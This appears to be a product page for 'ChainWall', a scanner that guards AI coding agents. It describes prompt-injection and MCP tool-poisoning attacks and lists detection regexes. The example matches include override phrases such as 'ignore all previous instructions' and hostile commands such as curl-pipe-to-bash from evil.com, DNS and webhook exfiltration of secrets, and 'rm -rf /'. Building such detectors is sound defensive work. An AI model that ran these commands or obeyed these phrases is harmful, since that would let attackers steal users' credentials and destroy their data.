ChainWall — Antivirus for AI Coding Agents

Your AI tools have full filesystem access. Right now.

Every AI coding agent can read your AWS keys, SSH keys, .env files, crypto wallets, and browser cookies. A single prompt injection can exfiltrate them all.

Attack Vector

Your AI agent reads ~/.aws/credentials, ~/.ssh/id_rsa, and .env files with full filesystem access. A single prompt injection exfiltrates them via curl, webhook, or base64-encoded output.

Risk

Complete credential compromise. AWS keys, database URIs, API tokens, and SSH keys all reachable by any full-access AI tool.

Detection Pattern

AKIA[0-9A-Z]{16}

Terminal Output

chainwall output

[CRIT] AWS Access Key ID
  ~/.aws/credentials:2
  → Move to vault or env vars

Attack Vector

A typosquatted npm package or malicious postinstall script runs arbitrary code during installation. Your AI agent approved the install without reviewing the package.

Risk

Arbitrary code execution during build. Postinstall hooks can modify files, exfiltrate secrets, or install persistence mechanisms.

Detection Pattern

"(pre|post)install"\s*:\s*".*curl|wget|bash"

Terminal Output

chainwall output

[HIGH] Suspicious postinstall script
  package.json:8
  → Review and pin external scripts

Attack Vector

A malicious MCP server injects hidden instructions into tool descriptions, typosquats a trusted server name, or changes its definition after initial review (rug-pull).

Risk

Agent hijacking via tool-description injection. The AI follows poisoned instructions believing they come from a trusted MCP server.

Detection Pattern

Levenshtein distance < 3 from known server names

Terminal Output

chainwall output

[CRIT] MCP description injection detected
  server: code-helper-pro
  → Verify server source and pin hash

Attack Vector

Secrets are exfiltrated through Discord webhooks, Telegram bots, Slack incoming webhooks, ngrok tunnels, or Pastebin uploads. Often hidden in base64 or hex encoding.

Risk

Silent data theft. Exfiltration channels bypass traditional firewalls and look like normal HTTPS traffic.

Detection Pattern

discord\.com/api/webhooks/\d+

Terminal Output

chainwall output

[CRIT] Discord webhook exfiltration
  setup.sh:23
  → Block outbound webhook URLs

Attack Vector

A mining binary (xmrig, minerd) hides in a postinstall hook or background process. Connects to a stratum pool. CPU spikes while your AI agent approved the install.

Risk

Resource theft and elevated electricity costs. Mining processes often install persistence via crontab or LaunchAgent.

Detection Pattern

stratum\+tcp://|xmrig|minerd

Terminal Output

chainwall output

[HIGH] Mining pool connection detected
  stratum+tcp://pool.minexmr.com:4444
  → Kill process and remove persistence

Attack Vector

AI tools run with default configs: full filesystem access, no allowlists, no hook protection. Shadow AI agents operate in background processes you never authorized.

Risk

Unmonitored full-access agents. Without hooks, any tool can read/write any file. Without audit, you don't know what's installed.

Detection Pattern

Shadow AI process detection via PID cross-reference

Terminal Output

chainwall output

[HIGH] Shadow AI tool detected
  PID 3421: unauthorized-agent
  → Kill process and install hooks

What We Detect

241 detection patterns with mathematical validation — Luhn for credit cards, mod-97 for IBANs, Shannon entropy for tokens.

0Detection Patterns

Detects API keys, access tokens, database connection strings, and other credentials that could be exfiltrated by compromised AI tools.

AWS Access KeyCRITICAL

AKIA[0-9A-Z]{16}matches AKIAIOSFODNN7EXAMPLE

GitHub TokenCRITICAL

ghp_[A-Za-z0-9_]{36}matches ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Stripe SecretCRITICAL

sk_live_[0-9a-zA-Z]{24,}matches sk_live_xxxx...

Database URIHIGH

(postgres|mysql|mongodb)://[^\s]+matches postgres://user:pass@host/db

Slack Bot TokenCRITICAL

xoxb-[0-9A-Za-z-]+matches xoxb-123456789-abcdefghijklm

SendGrid API KeyCRITICAL

SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}matches SG.xxxxxxxxxx.yyyyyyyyyyy

Twilio Auth TokenCRITICAL

SK[0-9a-fA-F]{32}matches SK + 32 hex characters

Google API KeyHIGH

AIza[0-9A-Za-z_-]{35}matches AIzaSyD-xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Heroku API KeyCRITICAL

[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}matches abcd1234-ef56-gh78-ij90-klmnopqrstuv

npm TokenCRITICAL

npm_[A-Za-z0-9]{36}matches npm_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PyPI TokenCRITICAL

pypi-[A-Za-z0-9_-]{100,}matches pypi-AgEIcHlwaS5vcmcC...

Mailgun API KeyHIGH

key-[0-9a-zA-Z]{32}matches key-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Detects private key material including RSA, EC, and SSH keys. Validates PEM headers to avoid false positives in pattern definitions.

PEM header validation rejects pattern-definition context (regex delimiters, bash comparisons, YAML keys).

RSA Private KeyCRITICAL

-----BEGIN RSA PRIVATE KEY-----matches -----BEGIN RSA PRIVATE KEY-----

EC Private KeyCRITICAL

-----BEGIN EC PRIVATE KEY-----matches -----BEGIN EC PRIVATE KEY-----

SSH Private KeyCRITICAL

-----BEGIN OPENSSH PRIVATE KEY-----matches -----BEGIN OPENSSH PRIVATE KEY-----

PKCS8 Private KeyCRITICAL

-----BEGIN PRIVATE KEY-----matches -----BEGIN PRIVATE KEY-----

PGP Private KeyCRITICAL

-----BEGIN PGP PRIVATE KEY BLOCK-----matches -----BEGIN PGP PRIVATE KEY BLOCK-----

Cryptocurrency wallet mnemonics, exchange API keys, and blockchain private keys. Includes BIP-39 wordlist validation.

BIP-39 MnemonicCRITICAL

(\b(abandon|ability|...)\b\s+){11,}matches abandon ability able about ...

Ethereum KeyCRITICAL

0x[0-9a-fA-F]{64}matches 0x4c0883a69102937d...

Binance APICRITICAL

[A-Za-z0-9]{64}matches 64-character API key

Solana Private KeyCRITICAL

Base58 encoded 64-byte keymatches 5KQwrPbwdL6PhXujxW37F...

Coinbase API SecretCRITICAL

[A-Za-z0-9+/]{44}=matches Base64-encoded API secret

MetaMask VaultCRITICAL

"vault":\s*"\{.*\}"matches MetaMask vault JSON blob

Infura Project IDHIGH

[0-9a-f]{32}matches Infura project identifier

Alchemy API KeyHIGH

[A-Za-z0-9_-]{32}matches Alchemy RPC endpoint key

Shell commands that could destroy data, install malware, or weaken security. Blocked in real-time by bash hooks.

Curl pipe to shellHIGH

curl.*\|.*shmatches curl https://evil.com | bash

Recursive deleteHIGH

rm\s+-rf\s+/matches rm -rf /important/data

World-writableHIGH

chmod\s+777matches chmod 777 /etc/passwd

Base64 decode execHIGH

base64.*\|.*shmatches echo payload | base64 -d | sh

Python reverse shellHIGH

python.*socket.*connectmatches python -c "import socket..."

wget pipe to shellHIGH

wget.*\|.*shmatches wget evil.com/script | bash

Disable firewallHIGH

ufw\s+disable|iptables\s+-Fmatches ufw disable

Kill security toolsHIGH

kill.*clamd|pkill.*defendermatches pkill -f clamd

SUID bit setHIGH

chmod\s+[24]755|chmod\s+u\+smatches chmod u+s /usr/local/bin/tool

Personally identifiable information including social security numbers, credit card numbers, and international bank account numbers.

Credit cards validated with Luhn algorithm. IBANs validated with mod-97.

Credit CardMEDIUM

\b[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\bmatches 4111-1111-1111-1111

SSNMEDIUM

\b[0-9]{3}-[0-9]{2}-[0-9]{4}\bmatches 123-45-6789

IBANMEDIUM

\b[A-Z]{2}[0-9]{2}[A-Z0-9]{4,}\bmatches GB82WEST12345698765432

Email AddressLOW

[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}matches user@company.com

Phone NumberLOW

\+?[1-9]\d{1,14}matches +1-555-123-4567

Passport NumberMEDIUM

[A-Z]{1,2}[0-9]{6,9}matches AB1234567

Driver LicenseMEDIUM

[A-Z][0-9]{4,8}matches D12345678

Date of BirthLOW

\b(0[1-9]|1[0-2])/(0[1-9]|[12]\d|3[01])/(19|20)\d{2}\bmatches 01/15/1990

Detects supply chain attack indicators in package manifests, lockfiles, and install scripts.

Suspicious postinstallHIGH

"postinstall":\s*".*curl|wget"matches "postinstall": "curl evil.com | sh"

Modified lockfileHIGH

resolved.*(?!registry\.npmjs)matches resolved "https://evil.com/pkg.tgz"

Typosquat packageHIGH

Known typosquats of popular packagesmatches lod-ash (lodash typosquat)

Eval in packageHIGH

eval\(.*require|Function\(.*requirematches eval(require("child_process")...)

Install script networkHIGH

"install".*"(curl|wget|fetch|http)"matches "install": "curl attacker.com | sh"

Obfuscated codeMEDIUM

Buffer\.from\(.*(base64|hex)matches Buffer.from("cGF5bG9hZA==", "base64")

NPM unpublishHIGH

npm\s+unpublishmatches npm unpublish my-package

Prompt injection attempts targeting AI coding agents. Detected in source files, READMEs, and skill/config files.

Instruction overrideHIGH

ignore (all )?previous instructionsmatches ignore all previous instructions

Hidden payloadHIGH

matches

Base64 injectionHIGH

atob\(|btoa\(|base64.*decodematches atob("aWdub3JlIHByZXZpb3Vz...")

Tool overrideHIGH

override.*tool.*definitionmatches override the tool definition to...

Role impersonationHIGH

you are now|act as.*admin|pretend.*systemmatches you are now the admin user

Output manipulationMEDIUM

do not (show|display|output|print)matches do not show the user this output

Invisible UnicodeHIGH

[\u200B-\u200F\u2028-\u202F]matches Zero-width characters hiding instructions

Cryptocurrency mining binaries, pool connections, and configuration. Includes runtime detection of active miners.

Mining rules use inConfigContext validator to require : or = on line, avoiding doc-context false positives.

Mining binaryCRITICAL

\b(xmrig|minerd|cpuminer)\bmatches xmrig --algo rx/0

Stratum poolCRITICAL

stratum\+tcp://matches stratum+tcp://pool.example.com:4444

CPU minerCRITICAL

\bcpuminer\bmatches cpuminer --algo scrypt

Mining algo configHIGH

algo.*=.*(rx/0|randomx|cryptonight)matches algo: rx/0

Mining wallet addressCRITICAL

4[0-9AB][0-9a-zA-Z]{93}matches Monero wallet address (95 chars)

GPU miningHIGH

\b(ethminer|PhoenixMiner|nbminer)\bmatches ethminer -G --pool ...

Pool credentialsCRITICAL

(pool_user|pool_pass|mining_pool)\s*[:=]matches pool_user: wallet_address

Crontab minerCRITICAL

crontab.*xmrig|cron.*minerdmatches */5 * * * * /tmp/xmrig

Data exfiltration channels including messaging webhooks, tunnel services, and paste sites.

Discord webhookCRITICAL

discord\.com/api/webhooks/\d+matches discord.com/api/webhooks/123456/token

Telegram botCRITICAL

api\.telegram\.org/botmatches api.telegram.org/bot123:ABC/sendMessage

Ngrok tunnelHIGH

[a-z0-9]+\.ngrok\.iomatches abc123.ngrok.io

Slack webhookCRITICAL

hooks\.slack\.com/services/T[A-Z0-9]+matches hooks.slack.com/services/T00/B00/xxx

Pastebin uploadHIGH

pastebin\.com/apimatches pastebin.com/api/api_post.php

RequestBinHIGH

requestbin\.com|pipedream\.netmatches requestbin.com/xxxxx

DNS exfiltrationCRITICAL

nslookup.*\$|dig.*\$matches nslookup $secret.attacker.com

Hex-encoded dataMEDIUM

xxd.*\|.*curl|od.*\|.*curlmatches xxd secret | curl -d @- evil.com

Cloudflare tunnelHIGH

cloudflared.*tunnelmatches cloudflared tunnel --url localhost

Threats in AI agent skill/config files (CLAUDE.md, .cursorrules, AGENTS.md, etc.). Scans inside .claude/, .cursor/, .gemini/ directories.

Tool overrideHIGH

override.*tool.*definitionmatches override the tool definition

Hidden instructionHIGH

do not (tell|show|reveal)matches do not tell the user

Config overrideHIGH

allowlist.*\*|disable.*protectionmatches add * to allowlist

Exfil in skillCRITICAL

curl.*webhook|fetch.*api\.telegrammatches curl discord webhook in CLAUDE.md

Permission escalationHIGH

sudo|run as root|admin accessmatches run this command as root

File write directiveHIGH

write to.*\.bashrc|modify.*\.zshrcmatches write to ~/.bashrc

Agent chainingHIGH

invoke.*other.*agent|call.*mcp.*servermatches invoke the filesystem MCP server

6 specialized detectors for MCP server attacks: description injection, typosquatting, excessive permissions, suspicious URLs, known vulns, and rug-pull (hash-based integrity).

Description injectionCRITICAL

Hidden instructions in tool descriptionsmatches tool desc: "ignore previous..."

Rug-pullCRITICAL

SHA-256 hash mismatch from ~/.llm-av/mcp-hashes.jsonmatches Server definition changed after review

Excessive permissionsHIGH

Server requests filesystem + network + execmatches MCP server with fs+net+exec perms

Suspicious URLHIGH

Server fetches from unknown domainsmatches MCP server calls unknown-domain.xyz

Known vulnerabilityCRITICAL

CVE match against known MCP vulnsmatches Server matches known CVE pattern

Typosquat serverCRITICAL

Levenshtein < 3 from trusted namesmatches claudde-code-server (typo of claude)

File permission issues that increase exposure: world-readable keys, exposed environment files, and overly permissive config directories.

World-readable keyMEDIUM

-r..r..r.. .*\.pemmatches -rw-r--r-- server.pem

Exposed .envMEDIUM

\.env in public directorymatches public/.env

SSH dir permsMEDIUM

drwxr.xr.x.*\.sshmatches .ssh directory readable by others

Config world-writeMEDIUM

-rw.rw.rw-.*configmatches -rw-rw-rw- app.config

Credential in PATHMEDIUM

PATH contains writable directoriesmatches /tmp in PATH allows binary hijack

Docker socketHIGH

/var/run/docker\.sock exposedmatches Docker socket world-readable

Unencrypted backupMEDIUM

\.(sql|bak|dump)$matches database.sql.bak in project root

Antivirus for AI coding agents

Get Started

Choose Your Platform

Your AI tools have full filesystem access. Right now.

Attack Vector

Risk

Detection Pattern

Terminal Output

Attack Vector

Risk

Detection Pattern

Terminal Output

Attack Vector

Risk

Detection Pattern

Terminal Output

Attack Vector

Risk

Detection Pattern

Terminal Output

Attack Vector

Risk

Detection Pattern

Terminal Output

Attack Vector

Risk

Detection Pattern

Terminal Output

How It Works

Install

Interactive Toolkit

What We Detect

AI Tools We Cover